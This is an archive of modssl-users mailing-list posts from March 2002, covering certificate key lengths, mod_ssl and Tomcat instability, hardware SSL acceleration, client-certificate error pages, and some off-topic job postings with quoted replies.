brectanu.ais.vt.edu (localhost [127.0.0.1]) by brectanu.ais.vt.edu (8.12.1/8.12.1) with ESMTP id g27Gs1KL020191 for ; Thu, 7 Mar 2002 11:54:01 -0500 Message-ID: <3C879B29.731E2CF1@brectanu.ais.vt.edu> Date: Thu, 07 Mar 2002 11:54:01 -0500 From: Brian Rectanus X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.4.18-rc1 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: SSL Cert info Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brian Rectanus X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I am looking for info on what risk is involved in a 40 bit SSL cert vs a 128 bit cert. When should one use a 128 bit cert over a 40 bit cert? If someone could please point me to some reliable info on this, I would appreciate it. Thanks, -Brian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 22:38:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25169; Thu, 7 Mar 2002 22:37:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from datgwy02.skf.se id WAA25125; Thu, 7 Mar 2002 22:36:48 +0100 (MET) Received: from skf.se (dns02.skf.net [163.157.8.12]) by datgwy02.skf.se (8.9.3/8.9.1) with ESMTP id WAA18529; Thu, 7 Mar 2002 22:30:34 +0100 (MET) Received: from IDSSPATRICK by skf.se (8.8.8+Sun/SMI-SVR4) id WAA04273; Thu, 7 Mar 2002 22:44:58 +0100 (MET) Message-ID: <005a01c1c61f$e9d041b0$70b89da3@kop.skf.se> From: "Patrick Willart" To: "cesar" , References: <3C87CFFB.C1C3FA34@advanceddb.com.br> Subject: Re: mod_ssl Date: Thu, 7 Mar 2002 13:34:41 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Patrick Willart" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Cesar, Mod_ssl isn't the problem.... It works fine. But when you also add JSP functionality (tomcat / WARP), the server becomes instable. It appears to be crashing when multiple requests for one or more JSPs are send to the server at the same time. Apache+mod_ssl works ok Apache+tomcat works ok but Apache+mod_ssl+tomcat works but is very instable. I actually changed to iPlanet ($ 1500) because of this. Apache 2.0 will have SSL integrated. Maybe the problem will be solved then... Personally I have good feelings about this because the way threading is handled is completely revised. Are you only getting an error message in the log and does everything work? Or doesn't it... Patrick ----- Original Message ----- From: "cesar" To: Sent: Thursday, March 07, 2002 12:39 PM Subject: mod_ssl > Hello Patrick > > I have a problem with apache+mod_ssl, when i execute any pages .jsp in > my web server(windows 2000) i receive this error log: > > You are using mod_ssl under Win32.This> combination is *NOT* officially > supported. Use it at your own risk! > > What is this?? > Is there a version stable of the apache+ssl for windows? > > Tks. > > Cesar > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 22:38:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25178; Thu, 7 Mar 2002 22:37:54 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA25114; Thu, 7 Mar 2002 22:36:24 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id BFC154CE750; Thu, 7 Mar 2002 22:36:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g27Js9371794; Thu, 7 Mar 2002 20:54:09 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id UAA17017; Thu, 7 Mar 2002 20:03:08 +0100 (MET) Date: Thu, 7 Mar 2002 20:03:08 +0100 (MET) Message-Id: <200203071903.UAA17017@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] HTTPS doesn't work (PR#669) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Carmen Shinzato Version: 2.8.7 OS: Solaris 2.7 Submission from: (NULL) (161.196.99.99) We have installed Apache 1.3.23 with Openssl 0.9.6b and mod_ssl 2.8.7, The HTTP protocol works well at port 8003 but the HTTPS doesn't work at port 8443, the error is: access denied to www.movilnet.com.ve:8443. For testing the HTTPS protocol we did the following: openssl-0.9.6b/apps/openssl s_client -connect localhost:8443 -state -debug And the result was: warning, not much extra random data, consider using the -rand option CONNECTED(00000003) SSL_connect:before/connect initialization write to 00156490 [00158608] (130 bytes => 130 (0x82)) 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ 0060 - 00 80 bf d6 ab 1b 5d 34-56 45 03 7f c1 8c 77 9a ......]4VE....w. 0070 - bd 05 db 04 f0 13 17 e0-66 55 cd 9d a2 d9 c6 6c ........fU.....l 0080 - b4 df .. SSL_connect:SSLv2/v3 write client hello A read from 00156490 [0015DB68] (7 bytes => 7 (0x7)) 0000 - 3c 21 44 4f 43 54 59 from visp.engelschall.com id WAA25111; Thu, 7 Mar 2002 22:36:23 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 9FA394CE743; Thu, 7 Mar 2002 22:36:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g27Js4V71782; Thu, 7 Mar 2002 20:54:04 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from vonemailsweep1.voneaccount.com id SAA13294; Thu, 7 Mar 2002 18:37:30 +0100 (MET) Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Thu, 7 Mar 2002 17:38:45 +0000 Subject: SSL Hardware acceleration questions . . . To: modssl-users@modssl.org From: mike.innes@Oneaccount.com Date: Thu, 7 Mar 2002 17:37:23 +0000 Message-ID: X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.8 |June 18, 2001) at 03/07/2002 05:37:24 PM MIME-Version: 1.0 Content-type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: mike.innes@Oneaccount.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear all, Has anyone had any experience with hardware acceleration? specifically: How easy is it to get MOD_SSL to be configured with hardware SSL cards (any cards to avoid/recommend). We have Sun hardware (so Sun/Sonicwall ?) Does anything need to be recompiled? which versions of OpenSSL are supported etc. Any specific experiences with iAS would be excellent. What are the performance advantages? Anything tio watch out for? TIA Mikey All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 22:48:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA25839; Thu, 7 Mar 2002 22:47:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id WAA25818; Thu, 7 Mar 2002 22:47:07 +0100 (MET) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C041E0@mail.rainbow.com> From: lgazis To: "'modssl-users@modssl.org'" Subject: RE: SSL Hardware acceleration questions . . . Date: Thu, 7 Mar 2002 13:48:29 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: lgazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Fairly easy. For those hardware accelerators which are supported by the OpenSSL engine version, all you need to do is to compile modSSL with the engine version of OpenSSL (present as a separate version of OpenSSL from OpenSSL 0.9.6 on), and include a line in httpd.conf setting SSLCryptoDevice to the engine you wish to use. I've set this up on Solaris, HP UX, AIX, Linux, and FreeBSD. Lynn Gazis -----Original Message----- From: mike.innes@Oneaccount.com [mailto:mike.innes@Oneaccount.com] Sent: Thursday, March 07, 2002 9:37 AM To: modssl-users@modssl.org Subject: SSL Hardware acceleration questions . . . Dear all, Has anyone had any experience with hardware acceleration? specifically: How easy is it to get MOD_SSL to be configured with hardware SSL cards (any cards to avoid/recommend). We have Sun hardware (so Sun/Sonicwall ?) Does anything need to be recompiled? which versions of OpenSSL are supported etc. Any specific experiences with iAS would be excellent. What are the performance advantages? Anything tio watch out for? TIA Mikey All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 7 23:25:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA27904; Thu, 7 Mar 2002 23:24:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from gristlepit.com id XAA27829; Thu, 7 Mar 2002 23:23:22 +0100 (MET) Received: (qmail 27837 invoked from network); 7 Mar 2002 22:23:19 -0000 Received: from unknown (HELO 162.121.244.2) (216.118.56.26) by gristlepit.com with SMTP; 7 Mar 2002 22:23:19 -0000 Message-ID: X-Mailer: BasiliX 1.1.0 -- http://basilix.org X-SenderIP: 162.121.244.2 Date: Thu, 07 Mar 2002 16:23:19 CST From: Ron Ridley Subject: Re: IE browser does not disply proper error message if the certificate is expired To: modssl-users@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Ridley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I posted a couple weeks back on the same problem. I had also tried setting specific ErrorDocument directives in my httpd.conf, but it didn't work. From what I can tell is that since the default errors are written into the apache/mod_ssl code to display errors in http not https and when all traffic from my site is forced through https(certificate required) you get a "page cannot be displayed" error. Looking around newsgroup archives the only suggestion I found was to prompt for a cert and add logic to your web app to allow access only if the proper credentials were set as environment variables. Unfortunately not everyone has their site setup with that much flexibility (mine for instance). I challenge those of you knowledgable in the intricacies of mod_ssl to explain why error messages don't display and a feasible workaround (preferrably using mod_ssl verification). On 07 Mar 2002 13:50 CST you wrote: > Any help from anyone? > I need this desperately. > Sincerely > Shiva > > > > --- Shiva Murugesan wrote: > > Many thanks jon. The problem occurs in 5.5 and 6.0 > > as > > well. > > I have tried unchecking the "Show friendly error > > message", still it is not displaying the correct SSL > > message. After unchecking, it started asking twice > > to > > present the client certificate. After presenting the > > client certificate for the second time, it displays > > the standard error message. > > > > Ta > > Shiva > > > > > > > > --- jon schatz wrote: > > > On Mon, 2002-03-04 at 15:50, jon schatz wrote: > > > > if you uncheck "Tools -> Internet Options -> > > > Advanced -> Show Friendly > > > > HTTP error messages", you can get more useful > > > info. Unfortunately, the > > > > default is to show the same error message for > > > everything. You'll have to > > > > change this by hand on your end users' machines > > > (or write an ActiveX > > > > control to do it for you). > > > > > > oops. this is on ie 5.5/6.0. i can't speak for ie > > > 5.0 personally. so > > > ymmv. > > > > > > -jon > > > > > > -- > > > jon@divisionbyzero.com || www.divisionbyzero.com > > > gpg key: www.divisionbyzero.com/pubkey.asc > > > think i have a virus?: > > > www.divisionbyzero.com/pgp.html > > > "You are in a twisty little maze of Sendmail > > rules, > > > all confusing." > > > > > > > > ATTACHMENT part 2 application/pgp-signature > > name=signature.asc > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Try FREE Yahoo! Mail - the world's greatest free > > email! > > http://mail.yahoo.com/ > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > > www.modssl.org > > User Support Mailing List > > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > __________________________________________________ > Do You Yahoo!? > Try FREE Yahoo! Mail - the world's greatest free email! > http://mail.yahoo.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 02:00:43 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA08540; Fri, 8 Mar 2002 01:59:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id BAA08520; Fri, 8 Mar 2002 01:58:35 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Mar 2002 16:47:27 -0800 Received: from 148.87.1.171 by lw9fd.law9.hotmail.msn.com with HTTP; Fri, 08 Mar 2002 00:47:27 GMT X-Originating-IP: [148.87.1.171] From: "avijeet banerjee" To: modssl-users@modssl.org Subject: Re: mod_ssl Date: Fri, 08 Mar 2002 00:47:27 Mime-Version: 1.0 Content-Type: text/html Message-ID: X-OriginalArrivalTime: 08 Mar 2002 00:47:27.0778 (UTC) FILETIME=[D2107020:01C1C63A] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "avijeet banerjee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users

We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.

Please send resumes ASAP.

thanks

Avijeet

 



 




Avijeet Banerjee
>From: "Patrick Willart"
>Reply-To: modssl-users@modssl.org
>To: "cesar" ,
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar"
>To:
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org

Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 02:01:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA08654; Fri, 8 Mar 2002 02:00:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id BAA08543; Fri, 8 Mar 2002 01:59:24 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Mar 2002 16:47:56 -0800 Received: from 148.87.1.171 by lw9fd.law9.hotmail.msn.com with HTTP; Fri, 08 Mar 2002 00:47:55 GMT X-Originating-IP: [148.87.1.171] From: "avijeet banerjee" To: modssl-users@modssl.org Subject: Job openings Date: Fri, 08 Mar 2002 00:47:55 Mime-Version: 1.0 Content-Type: text/html Message-ID: X-OriginalArrivalTime: 08 Mar 2002 00:47:56.0265 (UTC) FILETIME=[E30B3590:01C1C63A] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "avijeet banerjee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users



We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.

Please send resumes ASAP.

thanks

Avijeet

 



 




Avijeet Banerjee
>From: "Patrick Willart"
>Reply-To: modssl-users@modssl.org
>To: "cesar" ,
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar"
>To:
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org

Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 02:49:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA12095; Fri, 8 Mar 2002 02:48:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp02.hutchcity.com id CAA12040; Fri, 8 Mar 2002 02:47:39 +0100 (MET) Received: (qmail 35769 invoked from network); 8 Mar 2002 01:41:27 -0000 Received: from unknown (HELO webmaill05) ([202.45.84.76]) (envelope-sender ) by localhost (qmail-ldap-1.03) with SMTP for ; 8 Mar 2002 01:41:27 -0000 Message-ID: <16610159.1015552002930.JavaMail.root@webmaill05> Date: Fri, 8 Mar 2002 09:46:42 +0800 (HKT) From: Angus Lee To: modssl-users@modssl.org Subject: Re: .htaccess not processed with client authentication Mime-Version: 1.0 Content-Type: text/plain; charset=Big5 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Angus Lee X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, > Try to put all these directives in httpd.conf file and > also try to put the SSLRequire directive as follows But I want each user to set their client authentication access control to their directory. Is there any bug with previous versions of mod_ssl which would make client authentication fails? Angus Lee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 03:31:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA15902; Fri, 8 Mar 2002 03:30:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns01.taggis.com id DAA15807; Fri, 8 Mar 2002 03:29:57 +0100 (MET) Received: from taggis.com (hagar.taggis.com [10.0.0.40]) by ns01.taggis.com (8.11.6+Sun/8.9.1) with ESMTP id g282Sln17742 for ; Thu, 7 Mar 2002 18:28:47 -0800 (PST) Message-ID: <3C882486.5172039B@taggis.com> Date: Thu, 07 Mar 2002 18:40:06 -0800 From: "Mark J. Matheson" Organization: Howell Spatial Industries X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Job openings References: Content-Type: multipart/mixed; boundary="------------E7670A7823C7DB3303754AF5" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mark J. Matheson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------E7670A7823C7DB3303754AF5 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit avijeet banerjee wrote:
 
 
 
 We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks

Avijeet
 
 
 
 
 
 
 
 

Avijeet Banerjee
>From: "Patrick Willart" 
>Reply-To: modssl-users@modssl.org
>To: "cesar" 
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
>Mod_ssl isn't the problem.... It works fine. But when you also add JSP
>functionality (tomcat / WARP), the server becomes instable. It appears to be
>crashing when multiple requests for one or more JSPs are send to the server
>at the same time.
>
>Apache+mod_ssl works ok
>Apache+tomcat works ok
>
>but
>
>Apache+mod_ssl+tomcat works but is very instable.
>
>I actually changed to iPlanet ($ 1500) because of this.
>
>Apache 2.0 will have SSL integrated. Maybe the problem will be solved
>then... Personally I have good feelings about this because the way threading
>is handled is completely revised.
>
>Are you only getting an error message in the log and does everything work?
>Or doesn't it...
>
>Patrick
>----- Original Message -----
>From: "cesar" 
>To: 
>Sent: Thursday, March 07, 2002 12:39 PM
>Subject: mod_ssl
>
>
> > Hello Patrick
> >
> > I have a problem with apache+mod_ssl, when i execute any pages .jsp in
> > my web server(windows 2000) i receive this error log:
> >
> > You are using mod_ssl under Win32.This> combination is *NOT* officially
> > supported. Use it at your own risk!
> >
> > What is this??
> > Is there a version stable of the apache+ssl for windows?
> >
> > Tks.
> >
> > Cesar
> >
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>User Support Mailing List modssl-users@modssl.org
>Automated List Manager majordomo@modssl.org


Chat with friends online, try MSN Messenger: Click Here
______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org


contact me directly at markmath@taggis.com. I might be able to help

Mark
  --------------E7670A7823C7DB3303754AF5 Content-Type: text/x-vcard; charset=us-ascii; name="markmath.vcf" Content-Description: Card for Mark J. Matheson Content-Disposition: attachment; filename="markmath.vcf" Content-Transfer-Encoding: 7bit begin:vcard n:Matheson;Mark J. tel;cell:503.803.5712 tel;fax:503.650.5066 tel;work:503.722.7416 x-mozilla-html:FALSE url:www.GISjobs.com.au org:Howell Spatial Industries;USA Branch adr:;;855 Molalla Ave.;Oregon City;Or;97045;USA version:2.1 email;internet:markmath@taggis.com title:Executive Manager fn:Mark J. Matheson end:vcard --------------E7670A7823C7DB3303754AF5-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 03:36:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA16541; Fri, 8 Mar 2002 03:36:02 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.arity.com id DAA16417; Fri, 8 Mar 2002 03:34:58 +0100 (MET) Received: (qmail 12424 invoked from network); 8 Mar 2002 02:34:42 -0000 Received: from image.arity.com (65.204.1.131) by mail.arity.com with SMTP; 8 Mar 2002 02:34:42 -0000 Received: by image.arity.com with Internet Mail Service (5.5.2653.19) id ; Thu, 7 Mar 2002 21:42:58 -0500 Message-ID: From: "Paul G. Weiss" To: "'modssl-users@modssl.org'" Subject: RE: Job openings Date: Thu, 7 Mar 2002 21:42:51 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1C64A.F104AEA0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Paul G. Weiss" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1C64A.F104AEA0 Content-Type: text/plain -----Original Message----- From: Mark J. Matheson [mailto:markmath@taggis.com] Sent: Thursday, March 07, 2002 9:40 PM To: modssl-users@modssl.org Subject: Re: Job openings avijeet banerjee wrote: We have a requirement for a developer(senior) in a large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks Avijeet Avijeet Banerjee >From: "Patrick Willart" >Reply-To: modssl-users@modssl.org >To: "cesar" , >Subject: Re: mod_ssl >Date: Thu, 7 Mar 2002 13:34:41 -0800 > >Hi Cesar, > >Mod_ssl isn't the problem.... It works fine. But when you also add JSP >functionality (tomcat / WARP), the server becomes instable. It appears to be >crashing when multiple requests for one or more JSPs are send to the server >at the same time. > >Apache+mod_ssl works ok >Apache+tomcat works ok > >but > >Apache+mod_ssl+tomcat works but is very instable. > >I actually changed to iPlanet ($ 1500) because of this. > >Apache 2.0 will have SSL integrated. Maybe the problem will be solved >then... Personally I have good feelings about this because the way threading >is handled is completely revised. > >Are you only getting an error message in the log and does everything work? >Or doesn't it... > >Patrick >----- Original Message ----- >From: "cesar" >To: >Sent: Thursday, March 07, 2002 12:39 PM >Subject: mod_ssl > > > > Hello Patrick > > > > I have a problem with apache+mod_ssl, when i execute any pages .jsp in > > my web server(windows 2000) i receive this error log: > > > > You are using mod_ssl under Win32.This> combination is *NOT* officially > > supported. Use it at your own risk! > > > > What is this?? > > Is there a version stable of the apache+ssl for windows? > > > > Tks. > > > > Cesar > > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _____ Chat with friends online, try MSN Messenger: Click Here ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org contact me directly at markmath@taggis.com. I might be able to help Mark Thank you for sharing that with the group. -P ------_=_NextPart_001_01C1C64A.F104AEA0 Content-Type: text/html

 
-----Original Message-----
From: Mark J. Matheson [mailto:markmath@taggis.com]
Sent: Thursday, March 07, 2002 9:40 PM
To: modssl-users@modssl.org
Subject: Re: Job openings

avijeet banerjee wrote:

 
 
 We have a requirement for a developer(senior) in a  large software development organization. The person should have expertise in C , apache mods , Oracle Pl/sql and java/jsp experience would be an added advantage.Please send resumes ASAP.thanks

Avijeet
 
 
 
 
 
 
 
 

Avijeet Banerjee
>From: "Patrick Willart" 
>Reply-To: modssl-users@modssl.org
>To: "cesar" 
>Subject: Re: mod_ssl
>Date: Thu, 7 Mar 2002 13:34:41 -0800
>
>Hi Cesar,
>
